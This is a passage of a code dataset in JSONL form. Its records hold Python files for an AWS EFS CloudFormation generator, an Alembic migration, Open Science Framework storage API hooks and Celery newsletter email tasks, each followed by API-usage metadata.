MountTarget(\n \"ComputeSubnetEFSMT\",\n FileSystemId=If(create_efs, Ref(fs), Select(str(1), 
Ref(efs_options))),\n SecurityGroups=[Ref(compute_security_group)],\n SubnetId=Ref(compute_subnet_id),\n Condition=create_compute_mt,\n )\n )\n\n t.add_output(\n Output(\n \"FileSystemId\",\n Description=\"ID of the FileSystem\",\n Value=If(create_efs, Ref(fs), Select(\"1\", Ref(efs_options))),\n )\n )\n\n # Specify output file path\n json_file_path = args.target_path\n output_file = open(json_file_path, \"w\")\n output_file.write(t.to_json())\n output_file.close()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Take in generator related parameters\")\n parser.add_argument(\n \"--target-path\", type=str, help=\"The target path for generated substack template\", required=True\n )\n args = parser.parse_args()\n main(args)\n", "sub_path": "util/cfn-stacks-generators/generate-efs-substack.py", "file_name": "generate-efs-substack.py", "file_ext": "py", "file_size_in_byte": 5206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "troposphere.Template", "line_number": 7, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 12, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 19, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 22, "usage_type": "call"}, {"api_name": "troposphere.Parameter", "line_number": 25, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 34, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 38, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 40, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 42, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 53, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 53, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 56, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 57, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 59, "usage_type": "call"}, 
{"api_name": "troposphere.Equals", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 59, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 61, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 62, "usage_type": "call"}, {"api_name": "troposphere.And", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Condition", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Not", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Equals", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 65, "usage_type": "call"}, {"api_name": "troposphere.efs.FileSystem", "line_number": 69, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 71, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 71, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 72, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 72, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 73, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 73, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 73, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 73, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 74, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 74, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.NoValue", "line_number": 75, "usage_type": "argument"}, {"api_name": "troposphere.Select", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 75, "usage_type": "call"}, {"api_name": "troposphere.efs.MountTarget", "line_number": 81, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 83, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 84, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 85, "usage_type": "call"}, {"api_name": "troposphere.efs.MountTarget", "line_number": 91, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Select", 
"line_number": 93, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 94, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 95, "usage_type": "call"}, {"api_name": "troposphere.Output", "line_number": 101, "usage_type": "call"}, {"api_name": "troposphere.If", "line_number": 104, "usage_type": "call"}, {"api_name": "troposphere.Ref", "line_number": 104, "usage_type": "call"}, {"api_name": "troposphere.Select", "line_number": 104, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "335574117", "text": "\"\"\"empty message\n\nRevision ID: fabf2ca39860\nRevises: 6beff7876a3a\nCreate Date: 2018-04-16 15:43:09.997566\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fabf2ca39860'\ndown_revision = '6beff7876a3a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pre_shared_keys',\n sa.Column('attr_id', sa.Integer(), nullable=False),\n sa.Column('device_id', sa.String(length=8), nullable=False),\n sa.Column('psk', sa.Binary(), nullable=False),\n sa.ForeignKeyConstraint(['attr_id'], ['attrs.id'], ),\n sa.ForeignKeyConstraint(['device_id'], ['devices.id'], ),\n sa.PrimaryKeyConstraint('attr_id', 'device_id')\n )\n op.create_unique_constraint(None, 'devices', ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'devices', type_='unique')\n op.drop_table('pre_shared_keys')\n # ### end Alembic commands ###\n", "sub_path": "migrations/versions/fabf2ca39860_.py", "file_name": "fabf2ca39860_.py", "file_ext": "py", "file_size_in_byte": 1074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Binary", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 35, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 35, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 36, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "230771870", "text": "from __future__ import unicode_literals\n\nimport httplib\nimport logging\n\nfrom modularodm.exceptions import NoResultsFound\nfrom modularodm.storage.base import KeyExistsException\n\nfrom framework.auth import Auth\nfrom framework.exceptions 
import HTTPError\nfrom framework.auth.decorators import must_be_signed\nfrom framework.transactions.handlers import no_auto_transaction\n\nfrom website.models import User\nfrom website.project.decorators import (\n must_not_be_registration, must_have_addon,\n)\nfrom website.util import rubeus\nfrom website.project.model import has_anonymous_link\n\nfrom website.models import NodeLog\nfrom website.addons.osfstorage import model\nfrom website.addons.osfstorage import utils\nfrom website.addons.osfstorage import errors\nfrom website.addons.osfstorage import settings as osf_storage_settings\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_error(code, message_short=None, message_long=None):\n data = {}\n if message_short:\n data['message_short'] = message_short\n if message_long:\n data['message_long'] = message_long\n return HTTPError(code, data=data)\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_download_file_hook(node_addon, payload, **kwargs):\n try:\n path = payload['path'].strip('/')\n version_id = int(payload.get('version', 0)) - 1\n except KeyError:\n raise make_error(httplib.BAD_REQUEST, 'Path is required')\n except ValueError:\n raise make_error(httplib.BAD_REQUEST, 'Version must be an int or not specified')\n\n storage_node = model.OsfStorageFileNode.get_file(path, node_addon)\n if storage_node.is_deleted:\n raise HTTPError(httplib.GONE)\n\n version = storage_node.get_version(version_id)\n\n if payload.get('mode') != 'render':\n if version_id < 0:\n version_id = len(storage_node.versions) + version_id\n utils.update_analytics(node_addon.owner, storage_node._id, version_id)\n\n return {\n 'data': {\n 'name': storage_node.name,\n 'path': version.location_hash,\n },\n 'settings': {\n osf_storage_settings.WATERBUTLER_RESOURCE: version.location[osf_storage_settings.WATERBUTLER_RESOURCE],\n },\n }\n\n\ndef osf_storage_crud_prepare(node_addon, payload):\n try:\n auth = payload['auth']\n settings = payload['settings']\n metadata = payload['metadata']\n hashes = payload['hashes']\n worker = payload['worker']\n path = payload['path'].strip('/')\n except KeyError:\n raise HTTPError(httplib.BAD_REQUEST)\n user = User.load(auth.get('id'))\n if user is None:\n raise HTTPError(httplib.BAD_REQUEST)\n location = settings\n location.update({\n 'object': metadata['name'],\n 'service': metadata['provider'],\n })\n # TODO: Migrate existing worker host and URL\n location.update(worker)\n metadata.update(hashes)\n return path, user, location, metadata\n\n\n@must_be_signed\n@no_auto_transaction\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_upload_file_hook(node_addon, payload, **kwargs):\n\n if osf_storage_settings.DISK_SAVING_MODE:\n raise HTTPError(httplib.METHOD_NOT_ALLOWED)\n\n path, user, location, metadata = osf_storage_crud_prepare(node_addon, payload)\n path = path.split('/')\n\n if len(path) > 2:\n raise HTTPError(httplib.BAD_REQUEST)\n\n try:\n parent, child = path\n except ValueError:\n parent, (child, ) = node_addon.root_node, path\n\n if not isinstance(parent, model.OsfStorageFileNode):\n parent = model.OsfStorageFileNode.get_folder(parent, node_addon)\n\n try:\n created, record = False, parent.find_child_by_name(child)\n except NoResultsFound:\n created, record = True, parent.append_file(child)\n\n code = httplib.CREATED if created else httplib.OK\n version = record.create_version(user, location, metadata)\n\n return {\n 'status': 'success',\n 'path': record.path,\n 'version': version._id,\n 'downloads': 
record.get_download_count(),\n }, code\n\n\n@must_be_signed\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_update_metadata_hook(node_addon, payload, **kwargs):\n try:\n version_id = payload['version']\n metadata = payload['metadata']\n except KeyError:\n raise HTTPError(httplib.BAD_REQUEST)\n\n version = model.OsfStorageFileVersion.load(version_id)\n\n if version is None:\n raise HTTPError(httplib.NOT_FOUND)\n\n version.update_metadata(metadata)\n\n return {'status': 'success'}\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_not_be_registration\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_crud_hook_delete(payload, node_addon, **kwargs):\n try:\n path = payload['path'].strip('/')\n except KeyError:\n raise make_error(httplib.BAD_REQUEST, 'Path is required')\n\n storage_node = model.OsfStorageFileNode.get(path, node_addon)\n\n if storage_node == node_addon.root_node:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if storage_node.is_deleted:\n raise HTTPError(httplib.GONE)\n\n try:\n auth = Auth(User.load(payload['auth'].get('id')))\n if not auth:\n raise HTTPError(httplib.BAD_REQUEST)\n storage_node.delete(auth)\n except errors.DeleteError:\n raise HTTPError(httplib.NOT_FOUND)\n\n storage_node.save()\n return {'status': 'success'}\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_get_metadata_hook(node_addon, payload, **kwargs):\n path = payload.get('path')\n\n if not path:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if path == '/':\n fileobj = node_addon.root_node\n else:\n fileobj = model.OsfStorageFileNode.get(path.strip('/'), node_addon)\n\n if fileobj.is_deleted:\n raise HTTPError(httplib.GONE)\n\n if fileobj.kind == 'file':\n data = fileobj.serialized()\n data['fullPath'] = fileobj.materialized_path()\n return data\n\n return [\n child.serialized()\n for child in fileobj.children\n if not child.is_deleted\n ]\n\n\ndef osf_storage_root(node_settings, auth, **kwargs):\n \"\"\"Build HGrid JSON for root node. 
Note: include node URLs for client-side\n URL creation for uploaded files.\n \"\"\"\n node = node_settings.owner\n root = rubeus.build_addon_root(\n node_settings=node_settings,\n name='',\n permissions=auth,\n user=auth.user,\n nodeUrl=node.url,\n nodeApiUrl=node.api_url,\n )\n return [root]\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_get_revisions(payload, node_addon, **kwargs):\n node = node_addon.owner\n path = payload.get('path')\n is_anon = has_anonymous_link(node, Auth(private_key=payload.get('view_only')))\n\n if not path:\n raise HTTPError(httplib.BAD_REQUEST)\n\n record = model.OsfStorageFileNode.get(path.strip('/'), node_addon)\n\n # Return revisions in descending order\n return {\n 'revisions': [\n utils.serialize_revision(node, record, version, index=len(record.versions) - idx - 1, anon=is_anon)\n for idx, version in enumerate(reversed(record.versions))\n ]\n }\n\n\n@must_be_signed\n@utils.handle_odm_errors\n@must_have_addon('osfstorage', 'node')\ndef osf_storage_create_folder(payload, node_addon, **kwargs):\n path = payload.get('path')\n user = User.from_cookie(payload.get('cookie', ''))\n\n if not path or not user:\n raise HTTPError(httplib.BAD_REQUEST)\n\n split = path.strip('/').split('/')\n child = split.pop(-1)\n\n if not child:\n raise HTTPError(httplib.BAD_REQUEST)\n\n if split:\n parent = model.OsfStorageFileNode.get(split[0], node_addon)\n else:\n parent = node_addon.root_node\n\n try:\n folder = parent.append_folder(child)\n except KeyExistsException:\n folder = parent.find_child_by_name(child, kind='folder')\n if not folder.is_deleted:\n raise HTTPError(httplib.CONFLICT, data={\n 'message': 'Cannot create folder \"{name}\" because a file or folder already exists at path \"{path}\"'.format(\n name=folder.name,\n path=folder.materialized_path(),\n )\n })\n folder.undelete(Auth(user), recurse=False)\n folder.log(Auth(user), NodeLog.FOLDER_CREATED)\n\n return folder.serialized(), httplib.CREATED\n", "sub_path": "website/addons/osfstorage/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 28, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 37, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 48, "usage_type": "attribute"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 50, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get_file", "line_number": 52, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 52, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 52, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 54, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 54, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils.update_analytics", "line_number": 61, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 61, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.settings.WATERBUTLER_RESOURCE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings", "line_number": 69, "usage_type": "name"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 40, 
"usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 41, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 41, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 42, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 83, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 83, "usage_type": "attribute"}, {"api_name": "website.models.User.load", "line_number": 84, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 84, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 86, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 86, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings.DISK_SAVING_MODE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 104, "usage_type": "call"}, {"api_name": "httplib.METHOD_NOT_ALLOWED", "line_number": 104, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 110, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 110, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 117, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 117, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get_folder", "line_number": 118, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 118, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 118, "usage_type": "name"}, {"api_name": "modularodm.exceptions.NoResultsFound", "line_number": 122, "usage_type": "name"}, {"api_name": "httplib.CREATED", "line_number": 125, "usage_type": "attribute"}, {"api_name": "httplib.OK", "line_number": 125, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 98, "usage_type": "name"}, {"api_name": "framework.transactions.handlers.no_auto_transaction", "line_number": 99, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 100, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 143, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 143, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileVersion.load", "line_number": 145, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileVersion", "line_number": 145, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 145, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 148, "usage_type": "call"}, {"api_name": "httplib.NOT_FOUND", "line_number": 148, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 136, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 137, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 163, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 165, 
"usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 165, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 165, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 168, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 168, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 171, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 171, "usage_type": "attribute"}, {"api_name": "framework.auth.Auth", "line_number": 174, "usage_type": "call"}, {"api_name": "website.models.User.load", "line_number": 174, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 174, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 176, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 176, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.errors.DeleteError", "line_number": 178, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.errors", "line_number": 178, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 179, "usage_type": "call"}, {"api_name": "httplib.NOT_FOUND", "line_number": 179, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 155, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 156, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 156, "usage_type": "name"}, {"api_name": "website.project.decorators.must_not_be_registration", "line_number": 157, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 158, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 192, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 192, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 197, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 197, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 197, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 200, "usage_type": "call"}, {"api_name": "httplib.GONE", "line_number": 200, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 185, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 186, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 186, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 187, "usage_type": "call"}, {"api_name": "website.util.rubeus.build_addon_root", "line_number": 219, "usage_type": "call"}, {"api_name": "website.util.rubeus", "line_number": 219, "usage_type": "name"}, {"api_name": "website.project.model.has_anonymous_link", "line_number": 236, "usage_type": "call"}, {"api_name": "framework.auth.Auth", "line_number": 236, "usage_type": "call"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 239, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 239, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", 
"line_number": 241, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 241, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 241, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.serialize_revision", "line_number": 246, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 246, "usage_type": "name"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 230, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 231, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 231, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 232, "usage_type": "call"}, {"api_name": "website.models.User.from_cookie", "line_number": 257, "usage_type": "call"}, {"api_name": "website.models.User", "line_number": 257, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 260, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 260, "usage_type": "attribute"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 266, "usage_type": "call"}, {"api_name": "httplib.BAD_REQUEST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode.get", "line_number": 269, "usage_type": "call"}, {"api_name": "website.addons.osfstorage.model.OsfStorageFileNode", "line_number": 269, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.model", "line_number": 269, "usage_type": "name"}, {"api_name": "modularodm.storage.base.KeyExistsException", "line_number": 275, "usage_type": "name"}, {"api_name": "framework.exceptions.HTTPError", "line_number": 278, "usage_type": "call"}, {"api_name": "httplib.CONFLICT", "line_number": 278, "usage_type": "attribute"}, {"api_name": "framework.auth.Auth", "line_number": 284, "usage_type": "call"}, {"api_name": "framework.auth.Auth", "line_number": 285, "usage_type": "call"}, {"api_name": "website.models.NodeLog.FOLDER_CREATED", "line_number": 285, "usage_type": "attribute"}, {"api_name": "website.models.NodeLog", "line_number": 285, "usage_type": "name"}, {"api_name": "httplib.CREATED", "line_number": 287, "usage_type": "attribute"}, {"api_name": "framework.auth.decorators.must_be_signed", "line_number": 252, "usage_type": "name"}, {"api_name": "website.addons.osfstorage.utils.handle_odm_errors", "line_number": 253, "usage_type": "attribute"}, {"api_name": "website.addons.osfstorage.utils", "line_number": 253, "usage_type": "name"}, {"api_name": "website.project.decorators.must_have_addon", "line_number": 254, "usage_type": "call"}]} +{"seq_id": "285584925", "text": "# -*- encoding:utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom arrow import utcnow\nfrom flask import render_template\nfrom flask.ext.mail import Message\n\nfrom ..extensions import db, mail\nfrom ..models import Newsletter\nfrom .env import celery, logger\n\n\n@celery.task(ignore_result=True)\ndef validate_mails():\n records = Newsletter.query.\\\n filter(Newsletter.validate_ts.is_(None)).\\\n filter(Newsletter.last_mail.is_(None)).\\\n all()\n\n for record in records:\n msg = Message()\n msg.subject = \"Bestätigung zur Aufnahme in den Newsletter\"\n msg.add_recipient(record.email)\n 
msg.body = render_template(\"mail/newsletter_validate.txt\", hash=record.validate_hash)\n msg.send(mail)\n\n record.last_mail = utcnow().datetime\n db.session.add(record)\n db.session.commit()\n\n logger.info(\"validate mail send to: %s\" % msg.recipients[0])\n\n\n@celery.task(ignore_result=True)\ndef welcome_mails():\n records = Newsletter.query.\\\n filter(Newsletter.validate_ts.isnot(None)).\\\n filter(Newsletter.last_mail.isnot(None)).\\\n filter(Newsletter.last_mail < Newsletter.validate_ts).\\\n all()\n\n for record in records:\n msg = Message()\n msg.subject = \"Willkommen beim BestellerKING Newsletter\"\n msg.add_recipient(record.email)\n msg.body = render_template(\"mail/newsletter_welcome.txt\")\n msg.send(mail)\n\n record.last_mail = utcnow().datetime\n db.session.add(record)\n db.session.commit()\n\n logger.info(\"welcome mail send to: %s\" % msg.recipients[0])\n", "sub_path": "app/tasks/newsletter.py", "file_name": "newsletter.py", "file_ext": "py", "file_size_in_byte": 1716, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Newsletter.query.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Newsletter.query", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Newsletter.validate_ts.is_", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Newsletter.validate_ts", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 20, "usage_type": "name"}, {"api_name": "models.Newsletter.last_mail.is_", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Newsletter.last_mail", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Newsletter", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.ext.mail.Message", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 28, "usage_type": "call"}, {"api_name": "extensions.mail", "line_number": 29, "usage_type": "argument"}, {"api_name": "arrow.utcnow", "line_number": 31, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 32, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 32, 